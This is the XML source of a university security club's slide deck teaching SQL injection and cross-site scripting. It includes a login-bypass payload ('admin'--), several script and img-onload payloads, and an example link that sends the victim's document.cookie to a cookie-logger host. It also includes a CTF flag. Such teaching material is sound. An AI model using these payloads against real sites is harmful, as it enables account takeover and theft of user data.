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Candara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andar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nda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82174ed84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82174ed8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82174ed84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82174ed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82174ed84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82174ed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82174ed84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82174ed8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82174ed84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82174ed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82174ed84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82174ed8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82174ed84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82174ed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82174ed84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82174ed8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82174ed84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82174ed8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82174ed84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82174ed8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8th, qualified for finals in new york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24th</a:t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82174ed84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82174ed8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Imagine if this wasn’t the case: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 site, petessupercoollegitimatewebsite.com, can read all your emails from mail.google.com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web as we know it becomes totally broken and insecure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82174ed84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82174ed8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e3e43a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ee3e43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56a5ecb5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56a5ecb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c53f550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c53f550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82174ed8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82174ed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82174ed8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82174ed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82174ed84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82174ed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to a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browser makes a request to a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looks up a matching user in the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user data is returned back to client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82174ed8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82174ed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82174ed8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82174ed8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24000" y="768002"/>
            <a:ext cx="91440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k">
  <p:cSld name="CUSTOM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  <a:defRPr b="1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 i="0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qlmapproject/sqlmap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portswigger.net/web-security/all-labs#sql-injection" TargetMode="External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ook.hacktricks.xyz/pentesting-web/xss-cross-site-script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tf.sigpwny.com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1524000" y="768002"/>
            <a:ext cx="91440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FA2022 Week 0</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3200"/>
              <a:t>3</a:t>
            </a:r>
            <a:endParaRPr b="0"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CC55"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Web Hacking II</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="32C95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Pet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>e and Kevin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50" y="433958"/>
            <a:ext cx="11721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09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$username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$password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2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384200" y="1313700"/>
            <a:ext cx="2952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$username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b="1"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endParaRPr sz="17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$password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sigpwny</a:t>
            </a:r>
            <a:endParaRPr sz="17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2" name="Google Shape;142;p18"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="140" idx="2"/>
            <a:endCxn id="141" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5860700" y="988658"/>
            <a:ext cx="0" cy="32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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="50" y="2623208"/>
            <a:ext cx="11721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09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'admin'--'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'sigpwny'</a:t>
            </a:r>
            <a:endParaRPr sz="2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4" name="Google Shape;144;p18"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="141" idx="2"/>
            <a:endCxn id="143" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5860650" y="2229600"/>
            <a:ext cx="0" cy="39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>
            <a:off x="50" y="3902858"/>
            <a:ext cx="1172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609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'admin'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" strike="sng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--' AND password = 'sigpwny'</a:t>
            </a:r>
            <a:endParaRPr sz="2400" strike="sngStrike">
              <a:solidFill>
                <a:srgbClr val="B7B7B7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288700" y="5315250"/>
            <a:ext cx="9144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This SQL expression will always log us in as the user with username “admin” without needing any password!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" name="Google Shape;147;p18"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="143" idx="2"/>
            <a:endCxn id="145" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5860700" y="3117608"/>
            <a:ext cx="0" cy="78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49" idx="1"/>
            <a:endCxn id="141" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="7337150" y="1771650"/>
            <a:ext cx="44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7783850" y="1382850"/>
            <a:ext cx="37344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 is a line comment in SQL!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(like // in C++)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0" y="4688134"/>
            <a:ext cx="11721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0960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b="1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'admin'</a:t>
            </a:r>
            <a:endParaRPr sz="2400" strike="sngStrike">
              <a:solidFill>
                <a:srgbClr val="B7B7B7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51" name="Google Shape;151;p18"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="145" idx="2"/>
            <a:endCxn id="150" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5860700" y="4296458"/>
            <a:ext cx="0" cy="39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/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6815375" y="2996250"/>
            <a:ext cx="321000" cy="48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 txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7136375" y="3070075"/>
            <a:ext cx="405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Inserted </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US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'--</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1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modifies query</a:t>
            </a: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Injection Techniques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838200" y="1825625"/>
            <a:ext cx="10515600" cy="479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Basic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Login as other users by changing clause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>
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>challenge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Union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Exfiltrate additional data from SQL database (users, passwords, other tables, etc)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>
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> challenge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Blind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Result of SQL query not passed back to client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Make query </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>take longer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>, measure time for page to load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Leaks information e.g. i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>s the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> first character 'A'?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Learning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sqlmap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Automated SQL Injections</a:t>
            </a:r>
            <a:endParaRPr sz="2400"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150" y="3285150"/>
            <a:ext cx="4253451" cy="32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portswigger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Tutorials and practice for SQL Injections</a:t>
            </a:r>
            <a:endParaRPr sz="2400"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00" y="3285150"/>
            <a:ext cx="6592349" cy="32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Cross-Site-Scripting (XSS)</a:t>
            </a:r>
            <a:endParaRPr sz="5600"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Attacker’s javascript on web pages that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>other clients </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>execute!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Recap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Programming language that interacts with website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Runs in </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US"/>
              <a:t>browser </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>(client side!)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997" y="4310500"/>
            <a:ext cx="3488000" cy="21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1969650" y="3239800"/>
            <a:ext cx="82527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5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"Meow!"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5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View Message App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7678350" y="2992675"/>
            <a:ext cx="3200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5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%- message %&gt;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sz="15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38525" y="2878625"/>
            <a:ext cx="51633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'/view'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'view'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36700" y="2334800"/>
            <a:ext cx="320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Code (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" u="sng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app.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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203600" y="2334800"/>
            <a:ext cx="415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Rendering Code (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" u="sng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view.ejs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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2" name="Google Shape;192;p23"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="7682025" y="4093625"/>
            <a:ext cx="1612200" cy="141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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5659925" y="5510525"/>
            <a:ext cx="449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User’s message put directly in HTML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481675" y="4387150"/>
            <a:ext cx="516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share notes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out my note! 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http://example.com/view?message=hello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10399550" y="4815100"/>
            <a:ext cx="1562100" cy="173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4950" y="974575"/>
            <a:ext cx="10515600" cy="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Message link                                                           View message</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill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3497925" y="1252538"/>
            <a:ext cx="4043100" cy="30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4600750" y="3370750"/>
            <a:ext cx="29403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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7723050" y="2984188"/>
            <a:ext cx="36540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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="204" name="Google Shape;204;p24"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="6087900" y="5202775"/>
            <a:ext cx="1517100" cy="18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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7723050" y="4812725"/>
            <a:ext cx="36540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7937050" y="1498500"/>
            <a:ext cx="30597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5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%- message %&gt;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814950" y="3125488"/>
            <a:ext cx="6162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/view?message=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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hello</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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814950" y="4876025"/>
            <a:ext cx="5679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/view?message=</a:t>
            </a:r>
            <a:r>
              <a:rPr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&lt;b&gt;bold&lt;/b&gt;</a:t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997850" y="642475"/>
            <a:ext cx="8196300" cy="69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/view?message=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt;alert("Hello!")&lt;/script&gt;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14" name="Google Shape;214;p25"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6911700" y="1188175"/>
            <a:ext cx="995100" cy="791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 txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7906700" y="1712425"/>
            <a:ext cx="42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is actually javascript code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 flipH="1">
            <a:off x="5959400" y="3820100"/>
            <a:ext cx="10800" cy="147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/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3524150" y="2611900"/>
            <a:ext cx="58482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50">
                <a:solidFill>
                  <a:srgbClr val="F44747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&lt;script&gt;alert('Hello!')&lt;/script&gt;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sz="15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1690" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4239338" y="5459600"/>
            <a:ext cx="3713325" cy="11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5"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5948875" y="1127433"/>
            <a:ext cx="8100" cy="178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XSS Techniques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38200" y="1825625"/>
            <a:ext cx="10515600" cy="45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Font typeface="Helvetica Neue"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600"/>
              <a:t>&lt;script&gt;alert(1)&lt;/script&gt;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Font typeface="Helvetica Neue"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600"/>
              <a:t>&lt;img src='https://github.com/favicon.ico' onload=alert(1) /&gt;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Char char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600"/>
              <a:t>also onerror=...</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US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Char char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600"/>
              <a:t>SVG XSS!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hacktricks.xyz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Extremely detailed list of XSS attack types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XSS Scope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838200" y="1825625"/>
            <a:ext cx="10515600" cy="184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Valuable information can be stored client-side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Cookies, Page Contents</a:t>
            </a:r>
            <a:endParaRPr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Imagine if t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>witter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> had this vulnerability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Everyone who views a malicious tweet instantly follows attacker on twitter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1710600" y="4248925"/>
            <a:ext cx="646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Hey check out my cool note! </a:t>
            </a:r>
            <a:r>
              <a:rPr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http://example.com/view?message=&lt;script&gt;fetch(“cookie-logger.com?c=” +document.cookie)&lt;/script&gt;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8807700" y="4464475"/>
            <a:ext cx="167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*Clicks on link*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*Browser sends attacker victim’s cookies*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2717750" y="3810225"/>
            <a:ext cx="160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Attacker</a:t>
            </a:r>
            <a:endParaRPr sz="2000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9189150" y="3823650"/>
            <a:ext cx="91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Victim</a:t>
            </a:r>
            <a:endParaRPr sz="2000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3032000" y="5574750"/>
            <a:ext cx="285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*Attacker logins into victim’s example.com account using cookies*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7" name="Google Shape;237;p27"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6781875" y="4847225"/>
            <a:ext cx="191520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7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5615700" y="5272800"/>
            <a:ext cx="319200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CSAW Results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We placed 9th overall and 8th in our region, so we qualified for finals in New York!</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US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Fall CTF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Next weekend (not this weekend!)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September 24th at 12 - 6PM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 sz="3200"/>
              <a:t>CIF 3039 (</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3200">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NOT SIEBEL CS 1404!!</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3200"/>
              <a:t>)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XSS Post-Exploitation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838200" y="1825625"/>
            <a:ext cx="9957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Send link with XSS to the victim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Steal cookies, read page contents, perform action as user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Why is XSS necessary?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Same-Origin-Policy (SOP)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Javascript can only read site info from the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng"/>
              <a:t>same domain</a:t>
            </a:r>
            <a:endParaRPr u="sng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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>hat happens without this?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try for yourself!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https://ctf.sigpwny.com</a:t>
            </a:r>
            <a:endParaRPr sz="32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chemeClr val="dk2"/>
              </a:solidFill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-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2 SQL Challenges</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:solidFill>
                <a:schemeClr val="dk2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-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3 XSS Challenges</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill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3351" y="1825625"/>
            <a:ext cx="2593800" cy="39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Meetings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2022-09-18</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US"/>
              <a:t> - This Sunday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Reverse Engineering Setup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We will setup Ghidra, pwntools, and other rev tools!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2022-09-22</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US"/>
              <a:t> - Next Thursday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Rev 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Learn how to use Ghidra and how to reverse engineer apps!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2022-09-24</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US"/>
              <a:t> - Next Saturday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Fall CTF 2022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12PM - 6PM in CIF 3039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601" y="2438788"/>
            <a:ext cx="7858800" cy="19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>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>sigpwny{is_it_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4100"/>
              <a:t>pronounced_sql_or_sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4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088" y="2688027"/>
            <a:ext cx="8461825" cy="26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for Today</a:t>
            </a:r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SQL Injection (SQLi)</a:t>
            </a:r>
            <a:endParaRPr sz="32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SQL Overview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Injection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Example</a:t>
            </a:r>
            <a:endParaRPr sz="2800"/>
          </a:p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Cross site scripting (XSS)</a:t>
            </a:r>
            <a:endParaRPr sz="3200"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Javascript recap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Injection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Example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Injection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Malicious user input that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>changes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>a SQL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Overview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38200" y="1573325"/>
            <a:ext cx="10515600" cy="4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to retrieve or store things in a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SQL "queries" are run on the server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Search for products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 accounts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logins</a:t>
            </a:r>
            <a:endParaRPr sz="240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438" y="3387000"/>
            <a:ext cx="8569125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250" y="4371350"/>
            <a:ext cx="5868374" cy="8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Login Flow</a:t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525" y="2230237"/>
            <a:ext cx="2397500" cy="2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853" y="2321312"/>
            <a:ext cx="2215375" cy="22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5"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="2911475" y="3135263"/>
            <a:ext cx="2716500" cy="291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3078549" y="2735075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Username, Password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 flipH="1">
            <a:off x="2939525" y="3707875"/>
            <a:ext cx="2660400" cy="210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740676" y="1705700"/>
            <a:ext cx="166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</a:t>
            </a:r>
            <a:endParaRPr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906113" y="1594175"/>
            <a:ext cx="14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  <a:endParaRPr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1075" y="22097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3348299" y="3728875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 / Failure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683327" y="1594175"/>
            <a:ext cx="17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</a:t>
            </a:r>
            <a:endParaRPr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flipH="1" rot="10800000">
            <a:off x="7653725" y="2996313"/>
            <a:ext cx="1622400" cy="10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7653725" y="2596125"/>
            <a:ext cx="11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Query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rot="10800000">
            <a:off x="7653575" y="3729125"/>
            <a:ext cx="1611900" cy="5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7852025" y="3729125"/>
            <a:ext cx="16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Matching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Login Query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0" y="2743175"/>
            <a:ext cx="1179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lang="en-US" sz="1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lang="en-US" sz="1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'admin' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1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'password'</a:t>
            </a:r>
            <a:endParaRPr sz="2300"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="115" name="Google Shape;115;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358925" y="4104525"/>
            <a:ext cx="161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all "rows" (entries) from...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376525" y="4104575"/>
            <a:ext cx="108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table called "users"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315573" y="4104525"/>
            <a:ext cx="161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such that the following conditions are true...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789525" y="4104525"/>
            <a:ext cx="375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-"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username column (field) is "admin"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-"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password column is "password"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01975" y="2755075"/>
            <a:ext cx="2040600" cy="47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6"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="115" idx="0"/>
            <a:endCxn id="119" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="1167275" y="3227925"/>
            <a:ext cx="354900" cy="87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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2542575" y="2755075"/>
            <a:ext cx="860400" cy="47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6"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="116" idx="0"/>
            <a:endCxn id="121" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="2917425" y="3227975"/>
            <a:ext cx="55500" cy="87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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3402975" y="2754300"/>
            <a:ext cx="912600" cy="47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6"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="117" idx="0"/>
            <a:endCxn id="123" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3859423" y="3227025"/>
            <a:ext cx="1264500" cy="87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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4338425" y="2754300"/>
            <a:ext cx="6623400" cy="47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6"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="118" idx="0"/>
            <a:endCxn id="125" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="7650075" y="3227025"/>
            <a:ext cx="1017000" cy="87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Code</a:t>
            </a:r>
            <a:endParaRPr sz="3000"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$username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$password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//Actual SQL query is here V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$query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en-US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b="1"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$username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b="1" lang="en-US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$password</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"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'"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$db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fetchArray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'Welcome'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-US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9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7"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="134" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7189800" y="2255075"/>
            <a:ext cx="563700" cy="1072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7753500" y="1885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puts our username input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1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directly </a:t>
            </a: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into the query!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5381750" y="3892125"/>
            <a:ext cx="579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we set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="24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$username</a:t>
            </a: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24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$password</a:t>
            </a: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so that it changes the SQL query?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GPwny">
  <a:themeElements>
    <a:clrScheme name="Office Theme">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="33CC55"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="FF4040"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="41AAFF"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="ED7A31"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="FFC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